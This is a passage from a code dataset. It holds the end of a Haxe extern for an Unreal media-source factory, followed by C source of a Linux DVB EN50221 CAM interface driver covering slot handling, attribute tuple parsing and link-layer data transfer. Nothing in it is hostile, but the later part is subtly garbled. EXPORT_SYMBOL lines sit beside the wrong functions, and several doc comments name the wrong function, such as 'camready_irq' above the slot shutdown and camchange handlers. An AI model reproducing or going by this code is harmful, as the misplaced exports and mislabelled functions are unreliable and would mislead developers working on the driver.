Because of that, some of its methods are inaccessible\n \n Implements a factory for UFileMediaSource objects.\n**/\n@:umodule(\"MediaPlayerEditor\")\n@:glueCppIncludes(\"Private/Factories/FileMediaSourceFactoryNew.h\")\n@:noClass @:uextern @:uclass extern class UFileMediaSourceFactoryNew extends unreal.editor.UFactory {\n \n}\n"} {"text": "/*\n * dvb_ca.c: generic DVB functions for EN50221 CAM interfaces\n *\n * Copyright (C) 2004 Andrew de Quincey\n *\n * Parts of this file were based on sources as follows:\n *\n * Copyright (C) 2003 Ralph Metzler \n *\n * based on code:\n *\n * Copyright (C) 1999-2002 Ralph Metzler\n * & Marcus Metzler for convergence integrated media GmbH\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License\n * as published by the Free Software Foundation; either version 2\n * of the License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * Or, point your browser to http://www.gnu.org/copyleft/gpl.html\n */\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"dvb_ca_en50221.h\"\n#include \"dvb_ringbuffer.h\"\n\nstatic int dvb_ca_en50221_debug;\n\nmodule_param_named(cam_debug, dvb_ca_en50221_debug, int, 0644);\nMODULE_PARM_DESC(cam_debug, \"enable verbose debug messages\");\n\n#define dprintk if (dvb_ca_en50221_debug) printk\n\n#define INIT_TIMEOUT_SECS 10\n\n#define HOST_LINK_BUF_SIZE 0x200\n\n#define RX_BUFFER_SIZE 65535\n\n#define MAX_RX_PACKETS_PER_ITERATION 10\n\n#define CTRLIF_DATA 0\n#define CTRLIF_COMMAND 1\n#define CTRLIF_STATUS 1\n#define CTRLIF_SIZE_LOW 2\n#define CTRLIF_SIZE_HIGH 3\n\n#define CMDREG_HC 1\t/* Host control */\n#define CMDREG_SW 2\t/* Size write */\n#define CMDREG_SR 4\t/* Size read */\n#define CMDREG_RS 8\t/* Reset interface */\n#define CMDREG_FRIE 0x40\t/* Enable FR interrupt */\n#define CMDREG_DAIE 0x80\t/* Enable DA interrupt */\n#define IRQEN (CMDREG_DAIE)\n\n#define STATUSREG_RE 1\t/* read error */\n#define STATUSREG_WE 2\t/* write error */\n#define STATUSREG_FR 0x40\t/* module free */\n#define STATUSREG_DA 0x80\t/* data available */\n#define STATUSREG_TXERR (STATUSREG_RE|STATUSREG_WE)\t/* general transfer error */\n\n\n#define DVB_CA_SLOTSTATE_NONE 0\n#define DVB_CA_SLOTSTATE_UNINITIALISED 1\n#define DVB_CA_SLOTSTATE_RUNNING 2\n#define DVB_CA_SLOTSTATE_INVALID 3\n#define DVB_CA_SLOTSTATE_WAITREADY 4\n#define DVB_CA_SLOTSTATE_VALIDATE 5\n#define DVB_CA_SLOTSTATE_WAITFR 6\n#define DVB_CA_SLOTSTATE_LINKINIT 7\n\n\n/* Information on a CA slot */\nstruct dvb_ca_slot {\n\n\t/* current state of the CAM */\n\tint slot_state;\n\n\t/* mutex used for serializing access to one CI slot */\n\tstruct mutex slot_lock;\n\n\t/* Number of CAMCHANGES that have occurred since last processing */\n\tatomic_t camchange_count;\n\n\t/* Type of last CAMCHANGE */\n\tint camchange_type;\n\n\t/* base address of CAM config */\n\tu32 config_base;\n\n\t/* value to write into Config Control register */\n\tu8 config_option;\n\n\t/* if 1, the CAM supports DA IRQs */\n\tu8 
da_irq_supported:1;\n\n\t/* size of the buffer to use when talking to the CAM */\n\tint link_buf_size;\n\n\t/* buffer for incoming packets */\n\tstruct dvb_ringbuffer rx_buffer;\n\n\t/* timer used during various states of the slot */\n\tunsigned long timeout;\n};\n\n/* Private CA-interface information */\nstruct dvb_ca_private {\n\n\t/* pointer back to the public data structure */\n\tstruct dvb_ca_en50221 *pub;\n\n\t/* the DVB device */\n\tstruct dvb_device *dvbdev;\n\n\t/* Flags describing the interface (DVB_CA_FLAG_*) */\n\tu32 flags;\n\n\t/* number of slots supported by this CA interface */\n\tunsigned int slot_count;\n\n\t/* information on each slot */\n\tstruct dvb_ca_slot *slot_info;\n\n\t/* wait queues for read() and write() operations */\n\twait_queue_head_t wait_queue;\n\n\t/* PID of the monitoring thread */\n\tstruct task_struct *thread;\n\n\t/* Flag indicating if the CA device is open */\n\tunsigned int open:1;\n\n\t/* Flag indicating the thread should wake up now */\n\tunsigned int wakeup:1;\n\n\t/* Delay the main thread should use */\n\tunsigned long delay;\n\n\t/* Slot to start looking for data to read from in the next user-space read operation */\n\tint next_read_slot;\n\n\t/* mutex serializing ioctls */\n\tstruct mutex ioctl_mutex;\n};\n\nstatic void dvb_ca_en50221_thread_wakeup(struct dvb_ca_private *ca);\nstatic int dvb_ca_en50221_read_data(struct dvb_ca_private *ca, int slot, u8 * ebuf, int ecount);\nstatic int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot, u8 * ebuf, int ecount);\n\n\n/**\n * Safely find needle in haystack.\n *\n * @haystack: Buffer to look in.\n * @hlen: Number of bytes in haystack.\n * @needle: Buffer to find.\n * @nlen: Number of bytes in needle.\n * @return Pointer into haystack needle was found at, or NULL if not found.\n */\nstatic char *findstr(char * haystack, int hlen, char * needle, int nlen)\n{\n\tint i;\n\n\tif (hlen < nlen)\n\t\treturn NULL;\n\n\tfor (i = 0; i <= hlen - nlen; i++) {\n\t\tif (!strncmp(haystack + i, needle, nlen))\n\t\t\treturn haystack + i;\n\t}\n\n\treturn NULL;\n}\n\n\n\n/* ******************************************************************************** */\n/* EN50221 physical interface functions */\n\n\n/**\n * dvb_ca_en50221_check_camstatus - Check CAM status.\n */\nstatic int dvb_ca_en50221_check_camstatus(struct dvb_ca_private *ca, int slot)\n{\n\tint slot_status;\n\tint cam_present_now;\n\tint cam_changed;\n\n\t/* IRQ mode */\n\tif (ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE) {\n\t\treturn (atomic_read(&ca->slot_info[slot].camchange_count) != 0);\n\t}\n\n\t/* poll mode */\n\tslot_status = ca->pub->poll_slot_status(ca->pub, slot, ca->open);\n\n\tcam_present_now = (slot_status & DVB_CA_EN50221_POLL_CAM_PRESENT) ? 1 : 0;\n\tcam_changed = (slot_status & DVB_CA_EN50221_POLL_CAM_CHANGED) ? 
1 : 0;\n\tif (!cam_changed) {\n\t\tint cam_present_old = (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_NONE);\n\t\tcam_changed = (cam_present_now != cam_present_old);\n\t}\n\n\tif (cam_changed) {\n\t\tif (!cam_present_now) {\n\t\t\tca->slot_info[slot].camchange_type = DVB_CA_EN50221_CAMCHANGE_REMOVED;\n\t\t} else {\n\t\t\tca->slot_info[slot].camchange_type = DVB_CA_EN50221_CAMCHANGE_INSERTED;\n\t\t}\n\t\tatomic_set(&ca->slot_info[slot].camchange_count, 1);\n\t} else {\n\t\tif ((ca->slot_info[slot].slot_state == DVB_CA_SLOTSTATE_WAITREADY) &&\n\t\t (slot_status & DVB_CA_EN50221_POLL_CAM_READY)) {\n\t\t\t// move to validate state if reset is completed\n\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_VALIDATE;\n\t\t}\n\t}\n\n\treturn cam_changed;\n}\n\n\n/**\n * dvb_ca_en50221_wait_if_status - Wait for flags to become set on the STATUS\n *\t register on a CAM interface, checking for errors and timeout.\n *\n * @ca: CA instance.\n * @slot: Slot on interface.\n * @waitfor: Flags to wait for.\n * @timeout_ms: Timeout in milliseconds.\n *\n * @return 0 on success, nonzero on error.\n */\nstatic int dvb_ca_en50221_wait_if_status(struct dvb_ca_private *ca, int slot,\n\t\t\t\t\t u8 waitfor, int timeout_hz)\n{\n\tunsigned long timeout;\n\tunsigned long start;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* loop until timeout elapsed */\n\tstart = jiffies;\n\ttimeout = jiffies + timeout_hz;\n\twhile (1) {\n\t\t/* read the status and check for error */\n\t\tint res = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS);\n\t\tif (res < 0)\n\t\t\treturn -EIO;\n\n\t\t/* if we got the flags, it was successful! */\n\t\tif (res & waitfor) {\n\t\t\tdprintk(\"%s succeeded timeout:%lu\\n\", __func__, jiffies - start);\n\t\t\treturn 0;\n\t\t}\n\n\t\t/* check for timeout */\n\t\tif (time_after(jiffies, timeout)) {\n\t\t\tbreak;\n\t\t}\n\n\t\t/* wait for a bit */\n\t\tmsleep(1);\n\t}\n\n\tdprintk(\"%s failed timeout:%lu\\n\", __func__, jiffies - start);\n\n\t/* if we get here, we've timed out */\n\treturn -ETIMEDOUT;\n}\n\n\n/**\n * dvb_ca_en50221_link_init - Initialise the link layer connection to a CAM.\n *\n * @ca: CA instance.\n * @slot: Slot id.\n *\n * @return 0 on success, nonzero on failure.\n */\nstatic int dvb_ca_en50221_link_init(struct dvb_ca_private *ca, int slot)\n{\n\tint ret;\n\tint buf_size;\n\tu8 buf[2];\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* we'll be determining these during this function */\n\tca->slot_info[slot].da_irq_supported = 0;\n\n\t/* set the host link buffer size temporarily. it will be overwritten with the\n\t * real negotiated size later. 
*/\n\tca->slot_info[slot].link_buf_size = 2;\n\n\t/* read the buffer size from the CAM */\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN | CMDREG_SR)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_wait_if_status(ca, slot, STATUSREG_DA, HZ / 10)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_read_data(ca, slot, buf, 2)) != 2)\n\t\treturn -EIO;\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN)) != 0)\n\t\treturn ret;\n\n\t/* store it, and choose the minimum of our buffer and the CAM's buffer size */\n\tbuf_size = (buf[0] << 8) | buf[1];\n\tif (buf_size > HOST_LINK_BUF_SIZE)\n\t\tbuf_size = HOST_LINK_BUF_SIZE;\n\tca->slot_info[slot].link_buf_size = buf_size;\n\tbuf[0] = buf_size >> 8;\n\tbuf[1] = buf_size & 0xff;\n\tdprintk(\"Chosen link buffer size of %i\\n\", buf_size);\n\n\t/* write the buffer size to the CAM */\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN | CMDREG_SW)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_wait_if_status(ca, slot, STATUSREG_FR, HZ / 10)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_write_data(ca, slot, buf, 2)) != 2)\n\t\treturn -EIO;\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN)) != 0)\n\t\treturn ret;\n\n\t/* success */\n\treturn 0;\n}\n\n/**\n * dvb_ca_en50221_read_tuple - Read a tuple from attribute memory.\n *\n * @ca: CA instance.\n * @slot: Slot id.\n * @address: Address to read from. Updated.\n * @tupleType: Tuple id byte. Updated.\n * @tupleLength: Tuple length. Updated.\n * @tuple: Dest buffer for tuple (must be 256 bytes). Updated.\n *\n * @return 0 on success, nonzero on error.\n */\nstatic int dvb_ca_en50221_read_tuple(struct dvb_ca_private *ca, int slot,\n\t\t\t\t int *address, int *tupleType, int *tupleLength, u8 * tuple)\n{\n\tint i;\n\tint _tupleType;\n\tint _tupleLength;\n\tint _address = *address;\n\n\t/* grab the next tuple length and type */\n\tif ((_tupleType = ca->pub->read_attribute_mem(ca->pub, slot, _address)) < 0)\n\t\treturn _tupleType;\n\tif (_tupleType == 0xff) {\n\t\tdprintk(\"END OF CHAIN TUPLE type:0x%x\\n\", _tupleType);\n\t\t*address += 2;\n\t\t*tupleType = _tupleType;\n\t\t*tupleLength = 0;\n\t\treturn 0;\n\t}\n\tif ((_tupleLength = ca->pub->read_attribute_mem(ca->pub, slot, _address + 2)) < 0)\n\t\treturn _tupleLength;\n\t_address += 4;\n\n\tdprintk(\"TUPLE type:0x%x length:%i\\n\", _tupleType, _tupleLength);\n\n\t/* read in the whole tuple */\n\tfor (i = 0; i < _tupleLength; i++) {\n\t\ttuple[i] = ca->pub->read_attribute_mem(ca->pub, slot, _address + (i * 2));\n\t\tdprintk(\" 0x%02x: 0x%02x %c\\n\",\n\t\t\ti, tuple[i] & 0xff,\n\t\t\t((tuple[i] > 31) && (tuple[i] < 127)) ? 
tuple[i] : '.');\n\t}\n\t_address += (_tupleLength * 2);\n\n\t// success\n\t*tupleType = _tupleType;\n\t*tupleLength = _tupleLength;\n\t*address = _address;\n\treturn 0;\n}\n\n\n/**\n * dvb_ca_en50221_parse_attributes - Parse attribute memory of a CAM module,\n *\textracting Config register, and checking it is a DVB CAM module.\n *\n * @ca: CA instance.\n * @slot: Slot id.\n *\n * @return 0 on success, <0 on failure.\n */\nstatic int dvb_ca_en50221_parse_attributes(struct dvb_ca_private *ca, int slot)\n{\n\tint address = 0;\n\tint tupleLength;\n\tint tupleType;\n\tu8 tuple[257];\n\tchar *dvb_str;\n\tint rasz;\n\tint status;\n\tint got_cftableentry = 0;\n\tint end_chain = 0;\n\tint i;\n\tu16 manfid = 0;\n\tu16 devid = 0;\n\n\n\t// CISTPL_DEVICE_0A\n\tif ((status =\n\t dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType, &tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x1D)\n\t\treturn -EINVAL;\n\n\n\n\t// CISTPL_DEVICE_0C\n\tif ((status =\n\t dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType, &tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x1C)\n\t\treturn -EINVAL;\n\n\n\n\t// CISTPL_VERS_1\n\tif ((status =\n\t dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType, &tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x15)\n\t\treturn -EINVAL;\n\n\n\n\t// CISTPL_MANFID\n\tif ((status = dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType,\n\t\t\t\t\t\t&tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x20)\n\t\treturn -EINVAL;\n\tif (tupleLength != 4)\n\t\treturn -EINVAL;\n\tmanfid = (tuple[1] << 8) | tuple[0];\n\tdevid = (tuple[3] << 8) | tuple[2];\n\n\n\n\t// CISTPL_CONFIG\n\tif ((status = dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType,\n\t\t\t\t\t\t&tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x1A)\n\t\treturn -EINVAL;\n\tif (tupleLength < 3)\n\t\treturn -EINVAL;\n\n\t/* extract the configbase */\n\trasz = tuple[0] & 3;\n\tif (tupleLength < (3 + rasz + 14))\n\t\treturn -EINVAL;\n\tca->slot_info[slot].config_base = 0;\n\tfor (i = 0; i < rasz + 1; i++) {\n\t\tca->slot_info[slot].config_base |= (tuple[2 + i] << (8 * i));\n\t}\n\n\t/* check it contains the correct DVB string */\n\tdvb_str = findstr((char *)tuple, tupleLength, \"DVB_CI_V\", 8);\n\tif (dvb_str == NULL)\n\t\treturn -EINVAL;\n\tif (tupleLength < ((dvb_str - (char *) tuple) + 12))\n\t\treturn -EINVAL;\n\n\t/* is it a version we support? 
*/\n\tif (strncmp(dvb_str + 8, \"1.00\", 4)) {\n\t\tprintk(\"dvb_ca adapter %d: Unsupported DVB CAM module version %c%c%c%c\\n\",\n\t\t ca->dvbdev->adapter->num, dvb_str[8], dvb_str[9], dvb_str[10], dvb_str[11]);\n\t\treturn -EINVAL;\n\t}\n\n\t/* process the CFTABLE_ENTRY tuples, and any after those */\n\twhile ((!end_chain) && (address < 0x1000)) {\n\t\tif ((status = dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType,\n\t\t\t\t\t\t\t&tupleLength, tuple)) < 0)\n\t\t\treturn status;\n\t\tswitch (tupleType) {\n\t\tcase 0x1B:\t// CISTPL_CFTABLE_ENTRY\n\t\t\tif (tupleLength < (2 + 11 + 17))\n\t\t\t\tbreak;\n\n\t\t\t/* if we've already parsed one, just use it */\n\t\t\tif (got_cftableentry)\n\t\t\t\tbreak;\n\n\t\t\t/* get the config option */\n\t\t\tca->slot_info[slot].config_option = tuple[0] & 0x3f;\n\n\t\t\t/* OK, check it contains the correct strings */\n\t\t\tif ((findstr((char *)tuple, tupleLength, \"DVB_HOST\", 8) == NULL) ||\n\t\t\t (findstr((char *)tuple, tupleLength, \"DVB_CI_MODULE\", 13) == NULL))\n\t\t\t\tbreak;\n\n\t\t\tgot_cftableentry = 1;\n\t\t\tbreak;\n\n\t\tcase 0x14:\t// CISTPL_NO_LINK\n\t\t\tbreak;\n\n\t\tcase 0xFF:\t// CISTPL_END\n\t\t\tend_chain = 1;\n\t\t\tbreak;\n\n\t\tdefault:\t/* Unknown tuple type - just skip this tuple and move to the next one */\n\t\t\tdprintk(\"dvb_ca: Skipping unknown tuple type:0x%x length:0x%x\\n\", tupleType,\n\t\t\t\ttupleLength);\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif ((address > 0x1000) || (!got_cftableentry))\n\t\treturn -EINVAL;\n\n\tdprintk(\"Valid DVB CAM detected MANID:%x DEVID:%x CONFIGBASE:0x%x CONFIGOPTION:0x%x\\n\",\n\t\tmanfid, devid, ca->slot_info[slot].config_base, ca->slot_info[slot].config_option);\n\n\t// success!\n\treturn 0;\n}\n\n\n/**\n * dvb_ca_en50221_set_configoption - Set CAM's configoption correctly.\n *\n * @ca: CA instance.\n * @slot: Slot containing the CAM.\n */\nstatic int dvb_ca_en50221_set_configoption(struct dvb_ca_private *ca, int slot)\n{\n\tint configoption;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* set the config option */\n\tca->pub->write_attribute_mem(ca->pub, slot,\n\t\t\t\t ca->slot_info[slot].config_base,\n\t\t\t\t ca->slot_info[slot].config_option);\n\n\t/* check it */\n\tconfigoption = ca->pub->read_attribute_mem(ca->pub, slot, ca->slot_info[slot].config_base);\n\tdprintk(\"Set configoption 0x%x, read configoption 0x%x\\n\",\n\t\tca->slot_info[slot].config_option, configoption & 0x3f);\n\n\t/* fine! */\n\treturn 0;\n\n}\n\n\n/**\n * dvb_ca_en50221_read_data - This function talks to an EN50221 CAM control\n *\tinterface. It reads a buffer of data from the CAM. The data can either\n *\tbe stored in a supplied buffer, or automatically be added to the slot's\n *\trx_buffer.\n *\n * @ca: CA instance.\n * @slot: Slot to read from.\n * @ebuf: If non-NULL, the data will be written to this buffer. If NULL,\n * the data will be added into the buffering system as a normal fragment.\n * @ecount: Size of ebuf. 
Ignored if ebuf is NULL.\n *\n * @return Number of bytes read, or < 0 on error\n */\nstatic int dvb_ca_en50221_read_data(struct dvb_ca_private *ca, int slot, u8 * ebuf, int ecount)\n{\n\tint bytes_read;\n\tint status;\n\tu8 buf[HOST_LINK_BUF_SIZE];\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* check if we have space for a link buf in the rx_buffer */\n\tif (ebuf == NULL) {\n\t\tint buf_free;\n\n\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t\tbuf_free = dvb_ringbuffer_free(&ca->slot_info[slot].rx_buffer);\n\n\t\tif (buf_free < (ca->slot_info[slot].link_buf_size + DVB_RINGBUFFER_PKTHDRSIZE)) {\n\t\t\tstatus = -EAGAIN;\n\t\t\tgoto exit;\n\t\t}\n\t}\n\n\t/* check if there is data available */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (!(status & STATUSREG_DA)) {\n\t\t/* no data */\n\t\tstatus = 0;\n\t\tgoto exit;\n\t}\n\n\t/* read the amount of data */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_SIZE_HIGH)) < 0)\n\t\tgoto exit;\n\tbytes_read = status << 8;\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_SIZE_LOW)) < 0)\n\t\tgoto exit;\n\tbytes_read |= status;\n\n\t/* check it will fit */\n\tif (ebuf == NULL) {\n\t\tif (bytes_read > ca->slot_info[slot].link_buf_size) {\n\t\t\tprintk(\"dvb_ca adapter %d: CAM tried to send a buffer larger than the link buffer size (%i > %i)!\\n\",\n\t\t\t ca->dvbdev->adapter->num, bytes_read, ca->slot_info[slot].link_buf_size);\n\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t\tif (bytes_read < 2) {\n\t\t\tprintk(\"dvb_ca adapter %d: CAM sent a buffer that was less than 2 bytes!\\n\",\n\t\t\t ca->dvbdev->adapter->num);\n\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t} else {\n\t\tif (bytes_read > ecount) {\n\t\t\tprintk(\"dvb_ca adapter %d: CAM tried to send a buffer larger than the ecount size!\\n\",\n\t\t\t ca->dvbdev->adapter->num);\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t}\n\n\t/* fill the buffer */\n\tfor (i = 0; i < bytes_read; i++) {\n\t\t/* read byte and check */\n\t\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_DATA)) < 0)\n\t\t\tgoto exit;\n\n\t\t/* OK, store it in the buffer */\n\t\tbuf[i] = status;\n\t}\n\n\t/* check for read error (RE should now be 0) */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (status & STATUSREG_RE) {\n\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\tstatus = -EIO;\n\t\tgoto exit;\n\t}\n\n\t/* OK, add it to the receive buffer, or copy into external buffer if supplied */\n\tif (ebuf == NULL) {\n\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t\tdvb_ringbuffer_pkt_write(&ca->slot_info[slot].rx_buffer, buf, bytes_read);\n\t} else {\n\t\tmemcpy(ebuf, buf, bytes_read);\n\t}\n\n\tdprintk(\"Received CA packet for slot %i connection id 0x%x last_frag:%i size:0x%x\\n\", slot,\n\t\tbuf[0], (buf[1] & 0x80) == 0, bytes_read);\n\n\t/* wake up readers when a last_fragment is received */\n\tif ((buf[1] & 0x80) == 0x00) {\n\t\twake_up_interruptible(&ca->wait_queue);\n\t}\n\tstatus = bytes_read;\n\nexit:\n\treturn status;\n}\n\n\n/**\n * dvb_ca_en50221_write_data - This function talks to an EN50221 CAM control\n *\t\t\t\tinterface. 
It writes a buffer of data to a CAM.\n *\n * @ca: CA instance.\n * @slot: Slot to write to.\n * @ebuf: The data in this buffer is treated as a complete link-level packet to\n * be written.\n * @count: Size of ebuf.\n *\n * @return Number of bytes written, or < 0 on error.\n */\nstatic int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot, u8 * buf, int bytes_write)\n{\n\tint status;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\n\t/* sanity check */\n\tif (bytes_write > ca->slot_info[slot].link_buf_size)\n\t\treturn -EINVAL;\n\n\t/* it is possible we are dealing with a single buffer implementation,\n\t thus if there is data available for read or if there is even a read\n\t already in progress, we do nothing but awake the kernel thread to\n\t process the data if necessary. */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exitnowrite;\n\tif (status & (STATUSREG_DA | STATUSREG_RE)) {\n\t\tif (status & STATUSREG_DA)\n\t\t\tdvb_ca_en50221_thread_wakeup(ca);\n\n\t\tstatus = -EAGAIN;\n\t\tgoto exitnowrite;\n\t}\n\n\t/* OK, set HC bit */\n\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND,\n\t\t\t\t\t\t IRQEN | CMDREG_HC)) != 0)\n\t\tgoto exit;\n\n\t/* check if interface is still free */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (!(status & STATUSREG_FR)) {\n\t\t/* it wasn't free => try again later */\n\t\tstatus = -EAGAIN;\n\t\tgoto exit;\n\t}\n\n\t/*\n\t * It may need some time for the CAM to settle down, or there might\n\t * be a race condition between the CAM, writing HC and our last\n\t * check for DA. This happens, if the CAM asserts DA, just after\n\t * checking DA before we are setting HC. In this case it might be\n\t * a bug in the CAM to keep the FR bit, the lower layer/HW\n\t * communication requires a longer timeout or the CAM needs more\n\t * time internally. 
But this happens in reality!\n\t * We need to read the status from the HW again and do the same\n\t * we did for the previous check for DA\n\t */\n\tstatus = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS);\n\tif (status < 0)\n\t\tgoto exit;\n\n\tif (status & (STATUSREG_DA | STATUSREG_RE)) {\n\t\tif (status & STATUSREG_DA)\n\t\t\tdvb_ca_en50221_thread_wakeup(ca);\n\n\t\tstatus = -EAGAIN;\n\t\tgoto exit;\n\t}\n\n\t/* send the amount of data */\n\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_SIZE_HIGH, bytes_write >> 8)) != 0)\n\t\tgoto exit;\n\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_SIZE_LOW,\n\t\t\t\t\t\t bytes_write & 0xff)) != 0)\n\t\tgoto exit;\n\n\t/* send the buffer */\n\tfor (i = 0; i < bytes_write; i++) {\n\t\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_DATA, buf[i])) != 0)\n\t\t\tgoto exit;\n\t}\n\n\t/* check for write error (WE should now be 0) */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (status & STATUSREG_WE) {\n\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\tstatus = -EIO;\n\t\tgoto exit;\n\t}\n\tstatus = bytes_write;\n\n\tdprintk(\"Wrote CA packet for slot %i, connection id 0x%x last_frag:%i size:0x%x\\n\", slot,\n\t\tbuf[0], (buf[1] & 0x80) == 0, bytes_write);\n\nexit:\n\tca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN);\n\nexitnowrite:\n\treturn status;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_camchange_irq);\n\n\n\n/* ******************************************************************************** */\n/* EN50221 higher level functions */\n\n\n/**\n * dvb_ca_en50221_camready_irq - A CAM has been removed => shut it down.\n *\n * @ca: CA instance.\n * @slot: Slot to shut down.\n */\nstatic int dvb_ca_en50221_slot_shutdown(struct dvb_ca_private *ca, int slot)\n{\n\tdprintk(\"%s\\n\", __func__);\n\n\tca->pub->slot_shutdown(ca->pub, slot);\n\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_NONE;\n\n\t/* need to wake up all processes to check if they're now\n\t trying to write to a defunct CAM */\n\twake_up_interruptible(&ca->wait_queue);\n\n\tdprintk(\"Slot %i shutdown\\n\", slot);\n\n\t/* success */\n\treturn 0;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_camready_irq);\n\n\n/**\n * dvb_ca_en50221_camready_irq - A CAMCHANGE IRQ has occurred.\n *\n * @ca: CA instance.\n * @slot: Slot concerned.\n * @change_type: One of the DVB_CA_CAMCHANGE_* values.\n */\nvoid dvb_ca_en50221_camchange_irq(struct dvb_ca_en50221 *pubca, int slot, int change_type)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\n\tdprintk(\"CAMCHANGE IRQ slot:%i change_type:%i\\n\", slot, change_type);\n\n\tswitch (change_type) {\n\tcase DVB_CA_EN50221_CAMCHANGE_REMOVED:\n\tcase DVB_CA_EN50221_CAMCHANGE_INSERTED:\n\t\tbreak;\n\n\tdefault:\n\t\treturn;\n\t}\n\n\tca->slot_info[slot].camchange_type = change_type;\n\tatomic_inc(&ca->slot_info[slot].camchange_count);\n\tdvb_ca_en50221_thread_wakeup(ca);\n}\nEXPORT_SYMBOL(dvb_ca_en50221_frda_irq);\n\n\n/**\n * dvb_ca_en50221_camready_irq - A CAMREADY IRQ has occurred.\n *\n * @ca: CA instance.\n * @slot: Slot concerned.\n */\nvoid dvb_ca_en50221_camready_irq(struct dvb_ca_en50221 *pubca, int slot)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\n\tdprintk(\"CAMREADY IRQ slot:%i\\n\", slot);\n\n\tif (ca->slot_info[slot].slot_state == DVB_CA_SLOTSTATE_WAITREADY) {\n\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_VALIDATE;\n\t\tdvb_ca_en50221_thread_wakeup(ca);\n\t}\n}\n\n\n/**\n * An FR or DA IRQ has occurred.\n 
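* (FR = Free and DA = Data Available bits in the CAM status register.)\n 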
